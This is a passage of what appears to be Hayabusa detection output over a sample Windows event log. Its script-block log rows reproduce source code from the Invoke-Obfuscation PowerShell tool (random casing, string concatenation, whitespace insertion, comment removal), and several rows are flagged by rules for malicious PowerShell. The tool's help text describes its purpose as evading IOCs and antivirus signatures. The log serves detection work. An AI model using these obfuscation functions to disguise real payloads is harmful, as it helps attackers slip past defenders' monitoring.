is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. 